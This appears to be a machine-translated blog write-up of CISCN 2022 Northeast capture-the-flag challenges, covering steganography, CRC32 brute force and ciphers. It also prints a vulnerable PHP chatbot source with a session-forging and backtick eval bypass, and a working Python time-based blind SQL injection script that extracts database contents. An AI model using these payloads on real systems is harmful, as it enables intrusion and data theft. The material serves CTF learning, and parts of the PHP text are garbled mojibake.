当前位置：网站首页>2022 ciscn China northeast repetition

2022 ciscn China northeast repetition

2022-08-05 18:21:00 【XINO,】

pikachu

stegsolve查看发现lsb隐写,Red, blue and green channels have encrypted strings,这里用setegA shuttle should also work

cGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGlrYSBwaXBpIHBpIHBpcGkgcGkgcGkgcGkgcGlwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaXBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpY2h1IHBpY2h1IHBpY2h1IHBpY2h1IGthIGNodSBwaXBpIHBpcGkgcGlwaSBwaXBpIHBpIHBpIHBpa2FjaHUgcGkgcGkgcGkgcGkgcGkgcGkgcGlrYWNodSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBwaWthY2h1IHBpIHBpIHBpIHBpIHBpIHBpIHBpa2FjaHUgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGlrYWNodSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBwaWthY2h1IHBpY2h1IGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIHBpa2FjaHUga2Ega2Ega2Ega2EgcGlrYWNodSBwaSBwaSBwaWthY2h1IHBpIHBpIHBpa2FjaHUgcGlwaSBwaWthY2h1IHBpY2h1IGthIGthIGthIGthIGthIHBpa2FjaHUgcGlwaSBwaSBwaSBwaWthY2h1IHBpY2h1IHBpIHBpIHBpIHBpa2FjaHUga2Ega2Ega2EgcGlrYWNodSBwaXBpIHBpa2FjaHUga2Ega2Ega2Ega2Ega2EgcGlrYWNodSBwaSBwaSBwaSBwaWthY2h1IHBpY2h1IGthIHBpa2FjaHUgcGkgcGkgcGkgcGlrYWNodSBrYSBwaWthY2h1IHBpcGkgcGkgcGlrYWNodSBwaWthY2h1IHBpY2h1IHBpIHBpa2FjaHUga2Ega2Ega2EgcGlrYWNodSBwaSBwaWthY2h1IHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpa2FjaHUga2Ega2Ega2Ega2Ega2Ega2EgcGlrYWNodSBwaXBpIHBpIHBpa2FjaHUgcGljaHUgcGlrYWNodSBwaXBpIGthIGthIGthIGthIGthIHBpa2FjaHUgcGkgcGkgcGkgcGkgcGkgcGlrYWNodSBwaWNodSBrYSBrYSBwaWthY2h1IHBpIHBpIHBpIHBpIHBpa2FjaHUga2EgcGlrYWNodSBrYSBrYSBrYSBrYSBwaWthY2h1IHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpa2FjaHUgcGlwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaWthY2h1IA==

感觉像base64,解码

pi pi pi pi pi pi pi pi pi pi pika pipi pi pipi pi pi pi pipi pi pi pi pi pi pi pi pipi pi pi pi pi pi pi pi pi pi pi pichu pichu pichu pichu ka chu pipi pipi pipi pipi pi pi pikachu pi pi pi pi pi pi pikachu ka ka ka ka ka ka ka ka ka ka ka pikachu pi pi pi pi pi pi pikachu pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pikachu ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka pikachu pichu ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka pikachu ka ka ka ka pikachu pi pi pikachu pi pi pikachu pipi pikachu pichu ka ka ka ka ka pikachu pipi pi pi pikachu pichu pi pi pi pikachu ka ka ka pikachu pipi pikachu ka ka ka ka ka pikachu pi pi pi pikachu pichu ka pikachu pi pi pi pikachu ka pikachu pipi pi pikachu pikachu pichu pi pikachu ka ka ka pikachu pi pikachu pi pi pi pi pi pi pi pi pikachu ka ka ka ka ka ka pikachu pipi pi pikachu pichu pikachu pipi ka ka ka ka ka pikachu pi pi pi pi pi pikachu pichu ka ka pikachu pi pi pi pi pikachu ka pikachu ka ka ka ka pikachu pi pi pi pi pi pi pi pi pikachu pipi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pikachu

pi ka chu解码
https://www.dcode.fr/pikalang-language

snowberg

010看下crc错报,Look at the encrypted stringaes

U2FsdGVkX1+mMxrc0YkGvTaB0c3A9EgFWvjghqa8j+J4vs0SO8q4qXO+OfKOIih+zOwLBe64L23McubUTe1dxA==

But it can't be unlocked without the key
之后zsteg发现lsb隐写,有个压缩包,save bin

4个文件,需要密码
在这里插入图片描述 We can do it if we have done similar questionsCRC32爆破
脚本地址
https://github.com/theonlypwner/crc32
Blast one by onekey

y0u_f0und_th1s_k3y

解码就行

old

base-rot13-W型栅栏3栏
Just a shuttle

welcomeToCiscn

F12源码查看flag,在/flag目录里面就是flag

会聊天的ctf机器人

imageRead any fileapi.php源码

```php<?phpinit();function init(){    $sesspath = "/tmp/session";    session_save_path($sesspath);    session_start();    if (!$_SESSION['cname'])        $_SESSION['cname'] = 'ck';    if(!file_dir_exists("/tmp/resource"))        mkdir("/tmp/resource");}
function file_dir_exists($path){    $dir = dir($path);    if ($dir)        if ($dir->read())            return true;    return is_file($path);}
function getres($input){    log_write($input);    chdir("/tmp/resource/");    $path = $_SESSION['cname'];    if(!file_dir_exists($path)){        return "è¯·å…ˆä¸Šä¼ è¯åº“æ–‡ä»¶ã€‚";    }    $ck = json_decode(file_get_contents($path),true);    foreach ($ck as $key => $value){        if (strstr($key,$input) or strstr($input,$key)){            $type = key($value);            $v = $value[$type];            switch ($type){                case "string":                    return $v;                case "image":                    $b64img = '<img src="data:image/png;base64,'.base64_encode(file_get_contents($v)) . '"/>';                    return $b64img;                case "calc":                    if ($_SESSION['is_admin']){                        if (preg_match("/\(|\)|\'|\"/im",$v)){                            return "åŒ…å«éžæ³•å—ç¬¦";                        }                        return eval("return $v;");                    }else{                        return "adminæ‰èƒ½ä½¿ç”¨è¿ä¸ªåŠŸèƒ½";                    }                default:                    return "è¿ä¸ªåŠ¨ä½œæš‚æ—¶è¿˜æ²¡èƒ½åžçŽ°";            }
        }    }    return "æ²¡æœ‰åŒ¹é…åˆ°è¯åº“æ¶ˆæ¯";}
function uploadc(){    $data = $_POST['uploadc'];    $filename = $_POST['cname'];    $resourcedir = "/tmp/resource/";    if(!file_dir_exists($resourcedir))        mkdir($resourcedir);    if(strpos($data,"<")){        die("åˆ«è¿æ ·ï¼");    }    if(strpos($filename,".")){        die("åˆ«è¿æ ·ï¼");    }    $_SESSION['cname'] = $filename;    if(file_put_contents($resourcedir.$filename,$data)) {        return "ä¸Šä¼ æˆåŠŸ";    }else{        return "ä¸Šä¼ å¤±è´¥";    }}function log_write($msg){    $logpath = "log.txt";    $oper = session_id();    $opername = substr($oper,0,1) ;    for ($i=0;$i <= strlen($oper);$i++)        $opername .= "*";    file_put_contents($logpath,"$opername : $msg \n",FILE_APPEND);}
if(isset($_POST['input']))    echo getres($_POST['input']);if(isset($_POST['uploadc']))    echo uploadc();if(isset($_POST['clear']))    file_put_contents("log.txt","");if(isset($_GET['log']))echo file_get_contents("log.txt");

通过upload写session文件,获取admin权限
Code execution filters out parentheses and quotes to bypass backticks directly
执行命令就可以了

ezsql

False positive injection,没有任何过滤,Note that the current database of the field is different from the database of this site,Backticks are required to clarify fields,Otherwise it doesn't work

import requests
url='http://192.168.166.131:58004/app/deleteaccount_status.php?account_status_number='
flag=''
for i in range(1,55):
    m=32
    n=127
    while 1:
        mid=(m+n)//2
        #payload="1'or if (ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))<{},sleep(1),0)%23".format(i,mid)#ctfshow_flagxc,ctfshow_info
        #mysql,information_schema,performance_schema,sys,mims,f0ig_wdp435s

        #payload="1'or if (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='f0ig_wdp435s'),{},1))<{},sleep(1),0)%23".format(i,mid)
        #account_status,account_type,accounts,customers,customers_sNpe,users

        #payload="1'or if (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='fllaaagggg'),{},1))<{},sleep(1),0)%23".format(i,mid)
        # [email protected]

        payload="1'or if(ascii(substr((select `[email protected]` from f0ig_wdp435s.fllaaagggg),{},1))<{},sleep(1),0)%23".format(i,mid)
        print(url+payload)
        try:
            r=requests.get(url=url+payload,timeout=2)
            m=mid
        except:
            n=mid
        if(m+1==n):
            flag+=chr(m)
            print(flag)
            break